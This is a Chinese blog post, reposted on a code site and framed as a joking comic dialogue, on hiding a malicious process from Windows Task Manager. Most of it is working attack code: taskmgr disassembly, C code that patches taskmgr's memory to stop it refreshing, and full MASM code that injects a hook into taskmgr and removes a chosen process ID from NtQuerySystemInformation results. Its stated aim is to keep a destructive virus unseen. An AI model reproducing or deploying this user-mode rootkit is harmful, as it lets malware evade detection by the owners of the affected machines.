首页 > 代码库 > [原创]反汇编之一:和Taskmgr过不去篇(无厘头版)
[原创]反汇编之一:和Taskmgr过不去篇(无厘头版)
原文链接:和Taskmgr过不去篇(无厘头版)
Hook入门级文章,主要想培养一下偶写文章的感觉,老鸟无视…我想看看技术文章能不能无厘头的写,如果效果不错的话,准备更上一层-----用我的原创漫画表达。:)
?(警告1:文章中有部分“限制级”词语,请11岁以下弟弟妹妹误入)?(警告2: 修正警告1,不是“误入”,是“勿入”哦,我没有做暗示哦…)
时间: 终结者2018年
场景: 地下泡泡澡堂
故事: 纯属虚构
在一场残酷的西红柿大战后,最终邪恶阿宝使用卑鄙无耻的招数轻松战胜了单纯的加菲,于是哥俩一起去地下废墟澡堂泡澡。在沉默了一阵之后加菲忽然问了阿宝?一个恐怖的问题……? ?
加菲:……你说我们俩身上的毛哪个值钱…
?阿宝:%##$%@#$%#@%#@,你想钱想疯啦……? ?
加菲:最近手头比较紧,有没有活接?? ?
阿宝:嘿嘿……搞定一个任务,钞票大大滴。? ?
加菲(口水状):什么呀??
?阿宝:老比最近打麻将输我200多,赖账不肯还……? ?
加菲:不会吧…人家是首富哦…? ?
阿宝:没办法呀,windows赔老喽,我准备把他的命根子毁了……? ?
加菲:你这个流氓,我不跟你玩了…? ?
阿宝:什么啊!我指的是他的windows,你想哪去了…? ?
加菲(迅速岔开话题):今天晚上太阳好亮哦…? ?
阿宝(画外音):#@$%#@%,我们俩到底谁邪恶…? ?
加菲:怎么毁呀?? ?
阿宝:我搞了一个宇宙超级大病毒程序,只要运行30分钟保准他的命根子玩蛋!?只要30分钟内不被windows taskmgr发现…? ?
加菲:你傻啊?人家不会用其他进程查看工具嘛??
?阿宝:说你不懂了吧,老比乱搞垄断,windows和taskmgr捆死了,其他?进程工具没法运行呀,嘿嘿…自掘死路…?
?加菲:这还不简单,做个rootkit在内核层把病毒进程隐藏起来不就行了。? ?
阿宝:进不去RING0,只能在用户层搞……,有没有其他办法…? ?
加菲:你超级病毒都能写出来,这个不会写?????? ?
阿宝(-_-b):少废话,你要不要钞票了…? ?
加菲:这个…? ?一炷香的功夫过去了…?
?阿宝:你到底想好了没啊?? ?
加菲:taskmgr显示进程信息的控件是SysListView32,我想可以截获显示每一行?的消息,然后忽略显示病毒进程的那一条消息…?
?阿宝:好啊…做一个dll植入taskmgr,然后SysListView32子类化到dll中的一个?消息处理函数,过滤特定进程的消息…? ?
加菲:没成功…可以截获和过滤消息,但显示老是会多出来一行…(可能是我?实现方法有问题,请看我以前发布的程序)? ?
阿宝:那怎么办啊?? ?加菲:要不然这样,做一个进程文本修改器,类似游戏修改器中的自动修改变量,?只不过这个变量是一个进程名,只要找到病毒进程名字的文本,就将成其他混淆视?听的名字(svchost.exe)。? ?
阿宝:8错,查找时要注意同时修改UNICODE的字符串哦…? ?
加菲:成功了,因为两个进程同时要写一个内容,所以极少数时间里可能会造成?病毒进程名漏出马脚…? ?
阿宝:嗯…病毒名有时会闪一下…进程数还是增加了…能不能干脆彻底删除这个?进程名而不是将其改成其他名字呢?? ?
加菲:这个…? ?阿宝(舔和路雪冰淇淋):搞得怎么样了,有什么新花样呢?? ?
加菲:如果你的超级病毒运行之后,就不准taskmgr 运行起来,如果已经运行起来?就将其关掉…? ?
阿宝:这个不行,太招人显眼了…?
?加菲:把taskmgr僵掉…?
?阿宝:你以为你是林正英啊???怎么僵呢???? ?
加菲:我刚才没事用IDA玩了一下taskmgr的body,发现一个好玩的?UpdateProcInfoArray过程哦,上代码(省略无关部分):
1 public: long __thiscall CProcPage::UpdateProcInfoArray(void) proc near 2 mov eax, dword_1016580 3 .text:0100CAD5 shr eax, 0Ah 4 .text:0100CAD8 mov ecx, eax 5 .text:0100CADA imul ecx, [ebp+var_1FC] 6 .text:0100CAE1 mov [ebp+var_88], ecx 7 .text:0100CAE7 mov ecx, eax 8 .text:0100CAE9 imul ecx, [ebp+var_1F8] 9 .text:0100CAF0 mov edx, eax10 .text:0100CAF2 imul edx, [ebp+var_1F0]11 .text:0100CAF9 mov [ebp+var_74], ecx12 .text:0100CAFC mov ecx, eax13 .text:0100CAFE imul ecx, [ebp+var_1F4]14 .text:0100CB05 mov [ebp+var_6C], edx15 .text:0100CB08 mov edx, eax16 .text:0100CB0A imul eax, [ebp+var_1B4]17 .text:0100CB11 imul edx, [ebp+var_1B8]18 .text:0100CB18 mov [ebp+var_7C], eax19 .text:0100CB1B add eax, edx20 .text:0100CB1D push edi21 .text:0100CB1E mov [ebp+var_78], eax22 .text:0100CB21 push 24h23 .text:0100CB23 lea eax, [ebp+var_F0]24 .text:0100CB29 push eax25 .text:0100CB2A push 15h26 .text:0100CB2C mov [ebp+var_70], ecx27 .text:0100CB2F mov [ebp+var_80], edx28 .text:0100CB32 mov __int64 g_MEMMax, ecx29 .text:0100CB38 mov dword_1016564, edi30 .text:0100CB3E call esi ; NtQuerySystemInformation(x,x,x,x)31 .text:0100CB40 test eax, eax32 .text:0100CB42 jge short loc_100CB4E33 .text:0100CB4234 .text:0100CB4435 .text:0100CB44 loc_100CB44: ; CODE XREF: CProcPage::UpdateProcInfoArray(void)+4Bj36 .text:0100CB44 ; CProcPage::UpdateProcInfoArray(void)+7Aj37 .text:0100CB44 mov eax, 80004005h38 .text:0100CB49 jmp loc_100CE7E39 .text:0100CB4940 .text:0100CB4E ; ---------------------------------------------------------------------------41 .text:0100CB4E42 .text:0100CB4E loc_100CB4E: ; CODE XREF: CProcPage::UpdateProcInfoArray(void)+EEj43 .text:0100CB4E mov eax, dword_101658044 .text:0100CB53 shr eax, 0Ah45 .text:0100CB56 imul eax, [ebp+var_DC]46 .text:0100CB5D mov ecx, ebx47 .text:0100CB5F mov [ebp+var_84], eax48 .text:0100CB65 call CProcPage::GetProcessInfo(void)49 .text:0100CB6550 .text:0100CB6A cmp eax, edi51 .text:0100CB6C mov [ebp+var_58], eax52 .text:0100CB6F jl loc_100CE6453 .text:0100CB6F54 .text:0100CB75 mov [ebp+var_48], edi55 .text:0100CB7556 .text:0100CB7857 .text:0100CB78 loc_100CB78: ; CODE XREF: CProcPage::UpdateProcInfoArray(void)+1EEj58 .text:0100CB78 mov esi, [ebx+10h]59 .text:0100CB7B add esi, [ebp+var_48]60 .text:0100CB7E mov eax, [esi+44h]61 .text:0100CB81 cmp eax, edi62 .text:0100CB83 jnz short loc_100CB8E63 .text:0100CB8364 .text:0100CB85 cmp [esi+4], edi65 .text:0100CB88 jz loc_100CC1D加菲:注意 call CProcPage::GetProcessInfo(void) 这一行,进去看看:
1 public: long __thiscall CProcPage::GetProcessInfo(void) proc near 2 .text:0100A6AF ; CODE XREF: CProcPage::UpdateProcInfoArray(void)+111p 3 .text:0100A6AF 4 .text:0100A6AF var_4 = dword ptr -4 5 .text:0100A6AF 6 .text:0100A6AF mov edi, edi 7 .text:0100A6B1 push ebp 8 .text:0100A6B2 mov ebp, esp 9 .text:0100A6B4 push ecx10 .text:0100A6B5 push ebx11 .text:0100A6B6 push esi12 .text:0100A6B7 xor ebx, ebx13 .text:0100A6B9 push edi14 .text:0100A6BA mov edi, ds:GetProcessHeap()15 .text:0100A6C0 mov esi, ecx16 .text:0100A6C2 mov [ebp+var_4], ebx17 .text:0100A6C218 .text:0100A6C519 .text:0100A6C5 loc_100A6C5: ; CODE XREF: CProcPage::GetProcessInfo(void)+63j20 .text:0100A6C5 mov eax, [esi+10h]21 .text:0100A6C8 cmp eax, ebx22 .text:0100A6CA jz short loc_100A6F923 .text:0100A6CA24 .text:0100A6CC push ebx25 .text:0100A6CD push dword ptr [esi+14h]26 .text:0100A6D0 push eax27 .text:0100A6D1 push 528 .text:0100A6D3 call ds:NtQuerySystemInformation(x,x,x,x)29 .text:0100A6D9 cmp eax, ebx30 .text:0100A6DB jge short loc_100A71B31 .text:0100A6DB32 .text:0100A6DD cmp eax, 0C0000004h33 .text:0100A6E2 jnz short loc_100A72334 .text:0100A6E235 .text:0100A6E4 mov eax, [esi+10h]36 .text:0100A6E7 cmp eax, ebx37 .text:0100A6E9 jz short loc_100A6F938 .text:0100A6E939 .text:0100A6EB push eax ; lpMem40 .text:0100A6EC push ebx ; dwFlags41 .text:0100A6ED call edi ; GetProcessHeap()42 .text:0100A6EF push eax ; hHeap43 .text:0100A6F0 call ds:HeapFree(x,x,x)44 .text:0100A6F6 mov [esi+10h], ebx45 .text:0100A6F646 .text:0100A6F947 .text:0100A6F9 loc_100A6F9: ; CODE XREF: CProcPage::GetProcessInfo(void)+1Bj48 .text:0100A6F9 ; CProcPage::GetProcessInfo(void)+3Aj49 .text:0100A6F9 add dword ptr [esi+14h], 1000h50 .text:0100A700 push dword ptr [esi+14h] ; dwBytes51 .text:0100A703 push ebx ; dwFlags52 .text:0100A704 call edi ; GetProcessHeap()53 .text:0100A706 push eax ; hHeap54 .text:0100A707 call ds:HeapAlloc(x,x,x)55 .text:0100A70D cmp eax, ebx56 .text:0100A70F mov [esi+10h], eax57 .text:0100A712 jnz short loc_100A6C558 .text:0100A71259 .text:0100A714 mov [ebp+var_4], 8007000Eh60 .text:0100A71461 .text:0100A71B62 .text:0100A71B loc_100A71B: ; CODE XREF: CProcPage::GetProcessInfo(void)+2Cj63 .text:0100A71B ; CProcPage::GetProcessInfo(void)+7Bj64 .text:0100A71B mov eax, [ebp+var_4]65 .text:0100A71E pop edi66 .text:0100A71F pop esi67 .text:0100A720 pop ebx68 .text:0100A721 leave69 .text:0100A722 retn阿宝:喔欧...(移动广告:3G时代...就说喔欧),这个比较明显了,里面调用?了原生态API NtQuerySystemInformation(x,x,x,x)...???
加菲:下面偶来写一个过程让taskmgr僵住:
1 #define MAGIC_ADDR 0x100cb65 2 static const byte VerFlag[] = {0xe8,0x45,0xdb,0xff,0xff}; 3 bool stoptm(DWORD pid) 4 { 5 bool bSuccess = false; 6 HANDLE ph = 0; 7 8 if(!pid) 9 {10 puts("taskmgr not run!");11 goto QUIT;12 }13 14 ph = OpenProcess(PROCESS_ALL_ACCESS,false,pid);15 if(!ph)16 {17 puts("can‘t open taskmgr!");18 goto QUIT;19 }20 21 byte fixbin[sizeof(VerFlag)];22 if(!ReadProcessMemory(ph,(LPCVOID)MAGIC_ADDR,fixbin,sizeof(fixbin),NULL))23 {24 puts("read mem failed!");25 goto QUIT;26 }27 28 if(memcmp(VerFlag,fixbin,sizeof(fixbin)))29 {30 puts("taskmgr isn‘t right ver!");31 goto QUIT;32 }33 34 memset(fixbin,0x90,sizeof(fixbin));35 if(!WriteProcessMemory(ph,(LPVOID)MAGIC_ADDR,fixbin,sizeof(fixbin),NULL))36 {37 puts("write mem failed!");38 goto QUIT;39 }40 41 bSuccess = true;42 QUIT:43 if(ph)44 CloseHandle(ph);45 return bSuccess;46 }阿宝:我好像能看懂了,将对应的调用语句NOP掉,从而taskmgr无法再刷新?进程列表了...但这个不能对应不同版本的taskmgr吧?? ?
加菲:这个...那是当然...?
?阿宝:你能不能给我个最终解决办法啊...? ?
加菲:没办法了...只有用各个版本通杀技了,HOOk NtQuerySystemInformation , ?然后改变其返回内容。要注意的是我们只需要HOOK 第一个参数为5的调用,?即Query系统进程信息,其他都不用理会。NtQuerySystemInformation ?获取进程信息如果成功,将会返回一个数组,或者称其为一个链表更准确。结构如下:
1 typedef struct _SYSTEM_PROCESSES 2 { 3 ULONG NextEntryDelta; //构成结构序列的偏移量; 4 ULONG ThreadCount; //线程数目; 5 ULONG Reserved1[6]; 6 LARGE_INTEGER CreateTime; //创建时间; 7 LARGE_INTEGER UserTime; //用户模式(Ring 3)的CPU时间; 8 LARGE_INTEGER KernelTime; //内核模式(Ring 0)的CPU时间; 9 UNICODE_STRING ProcessName; //进程名称;10 KPRIORITY BasePriority; //进程优先权;11 ULONG ProcessId; //进程标识符;12 ULONG InheritedFromProcessId; //父进程的标识符;13 ULONG HandleCount; //句柄数目;14 ULONG Reserved2[2];15 VM_COUNTERS VmCounters; //虚拟存储器的结构,见下;16 IO_COUNTERS IoCounters; //IO计数结构,见下;17 SYSTEM_THREADS Threads[1]; //进程相关线程的结构数组,见下;18 }SYSTEM_PROCESSES,*PSYSTEM_PROCESSES;19
加菲:我要做的只是在链表中查找需要隐藏进程的ID,然后将其剔除即可。? ?
阿宝:怎么剔除呢?? ?
加菲:分2种情况,若PID出现在链表的的尾部则直接将上一个链表指向NULL,?否则需要将上一个结构的指针指向PID结构后面一个结构,从而将其剔除,完整代码如下:
1 .386 2 .model flat, stdcall 3 option casemap:none 4 .nocref 5 .nolist 6 include D:/work/masm32/include/windows.inc 7 include D:/work/masm32/include/user32.inc 8 include D:/work/masm32/include/kernel32.inc 9 .list 10 .listmacro 11 .listmacroall 12 IFNDEF UNICODE_STRING 13 UNICODE_STRING struct 14 _Length WORD ? 15 MaximumLength WORD ? 16 Buffer PWSTR ? 17 UNICODE_STRING ends 18 PUNICODE_STRING typedef ptr UNICODE_STRING 19 ENDIF 20 SPI struct 21 NextOffset DWORD ? 22 DWORD ? 23 Times QWORD 6 dup(?) 24 ImageName UNICODE_STRING <?> 25 DWORD ? 26 ProcessId DWORD ? 27 Reserved DWORD 7 dup(?) 28 SPI ends 29 PSPI typedef ptr SPI 30 .const 31 szDll db "ntdll.dll",0 32 szQSI_func db "NtQuerySystemInformation",0 33 .code 34 ;********************************************************** 35 RT_BIN_START equ $ 36 PID DWORD ? ;要隐藏进程的pid 37 pQSI_func DWORD ? 38 pQSI_Next DWORD ? 39 pBuf DWORD ? 40 pRetAddr DWORD ? 41 pPreviousSPI PSPI 0 42 dwEBX DWORD ? 43 ;ORGBIN byte 5 dup(?) 44 FIXBIN byte 5 dup(?) 45 RT_CODE_OFFSET equ $ - RT_BIN_START 46 len0 textequ %RT_CODE_OFFSET 47 % echo RT_CODE_OFFSET is len0 48 ;++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 49 myQSI_func proc 50 mov ecx,ebx 51 call @F 52 @@: 53 pop ebx 54 sub ebx,offset @B 55 jmp DOIT 56 GoMaMa: 57 mov eax,dword ptr [esp] 58 mov dword ptr [esp + 4],eax 59 pop eax 60 ORGBIN byte 5 dup(?) 61 jmp [ebx + pQSI_Next] 62 DOIT: 63 mov dword ptr [ebx + dwEBX],ecx 64 mov dword ptr [ebx + pBuf],0 65 push dword ptr [esp] 66 pop dword ptr [ebx + pRetAddr] 67 .if dword ptr [esp + 4] == 5 68 push dword ptr [esp+8] 69 pop dword ptr [ebx + pBuf] 70 .endif 71 72 call GoMaMa 73 ;调用原始QSI成功且是获取SPIs的调用 74 .if eax == 0 && dword ptr [ebx + pBuf] != 0 75 assume eax:PSPI 76 mov ecx,dword ptr [ebx + PID] 77 mov eax,dword ptr [ebx + pBuf] 78 .while TRUE 79 .if [eax].ProcessId == ecx 80 .if [eax].NextOffset == 0 81 mov eax,[ebx + pPreviousSPI] 82 mov [eax].NextOffset,0 83 .else 84 mov ecx,[eax].NextOffset 85 mov eax,[ebx + pPreviousSPI] 86 add ecx,[eax].NextOffset 87 mov [eax].NextOffset,ecx 88 .endif 89 .break 90 .endif 91 .break .if [eax].NextOffset == 0 92 push eax 93 pop dword ptr [ebx + pPreviousSPI] 94 add eax,[eax].NextOffset 95 .endw 96 assume eax:nothing 97 .endif 98 99 mov ecx,ebx100 mov ebx,[ebx + dwEBX]101 jmp [ecx + pRetAddr]102 ;ret103 myQSI_func endp104 ;++++++++++++++++++++++++++++++++++++++++++++++++++++++++++105 RT_BIN_END equ $106 RT_BIN_LEN equ RT_BIN_END - RT_BIN_START107 T_BIN_LEN textequ %RT_BIN_LEN108 % echo RT_BIN_LEN is T_BIN_LEN109 ;++++++++++++++++++++++++++++++++++++++++++++++++++++++++++110 hookQSIfunc proc C uses ebx edi esi ph:HANDLE,pid:DWORD111 local bSuccess,pRTBin,oldProtect112 113 mov bSuccess,FALSE114 .if pid == 0115 jmp QUIT116 .endif117 invoke VirtualProtect,offset RT_BIN_START,/118 T_BIN_LEN,PAGE_EXECUTE_READWRITE,/119 addr oldProtect120 .if !eax121 jmp QUIT122 .endif123 invoke LoadLibrary,addr szDll124 invoke GetProcAddress,eax,addr szQSI_func125 .if !eax126 jmp QUIT127 .endif128 mov pQSI_func,eax129 130 invoke VirtualAllocEx,ph,NULL,T_BIN_LEN,/131 MEM_COMMIT,PAGE_EXECUTE_READWRITE132 .if !eax133 jmp QUIT134 .endif135 mov pRTBin,eax136 137 invoke ReadProcessMemory,ph,pQSI_func,/138 addr ORGBIN,5,NULL139 .if !eax140 jmp QUIT141 .endif142 mov eax,pRTBin143 add eax,RT_CODE_OFFSET144 sub eax,pQSI_func145 sub eax,5146 mov byte ptr [FIXBIN],0E9h147 mov dword ptr [FIXBIN+1],eax148 149 mov eax,pQSI_func150 add eax,5151 mov pQSI_Next,eax152 push pid153 pop PID154 invoke WriteProcessMemory,ph,pRTBin,/155 offset RT_BIN_START,T_BIN_LEN,NULL156 .if !eax157 jmp QUIT158 .endif159 invoke WriteProcessMemory,ph,pQSI_func,/160 addr FIXBIN,5,NULL161 .if !eax162 jmp QUIT163 .endif164 165 mov bSuccess,TRUE166 QUIT:167 .if pRTBin168 ;invoke VirtualFreeEx,ph,pRTBin,/169 ;T_BIN_LEN,MEM_RELEASE170 .endif171 mov eax,bSuccess172 ret173 hookQSIfunc endp174 ;**********************************************************175 end阿宝:你好像是HOOK之后,直接将以上代码拷贝到taskmgr.exe进程空间中,?等待其自动调用,是吗?? ?
加菲:没错,拷贝功能的函数即是hookQSIfunc,当然这要首先保证taskmgr在运行:
1 //检查taskmgr.exe当前是否在运行 2 DWORD findtm(void) 3 { 4 DWORD pid = 0; 5 6 PROCESSENTRY32 process = {.dwSize=sizeof(PROCESSENTRY32)}; 7 HANDLE hss = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); 8 Process32First(hss,&process); 9 while(Process32Next(hss,&process))10 {11 if(!strcmp(process.szExeFile,"taskmgr.exe"))12 {13 pid = process.th32ProcessID;14 break;15 }16 }17 18 CloseHandle(hss);19 return pid;20 }阿宝(暗笑):是这样啊...嘿嘿? ?
加菲(聚精会神地):这样一来无论哪个版本的taskmgr,只要获取机制没有变,?都可以搞定了,呵呵...终于搞定了...那个报酬怎么算...(回头),人呢???
阿宝(全裸速逃中...)
加菲:阿宝,你竟然敢欺骗偶的感情....
愤怒的加菲制造了N个加菲猫终结者T1300型追杀阿宝,至于阿宝能否逃脱,这就是另一个故事了哦 :)
(PS1:使用了电影分镜头剧本结构,适合改编为cartoon或flash之类的咚咚,结尾不是很好,修改中)
(PS2: 场景的选择是从刚看完的终结者2018获得的。)
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。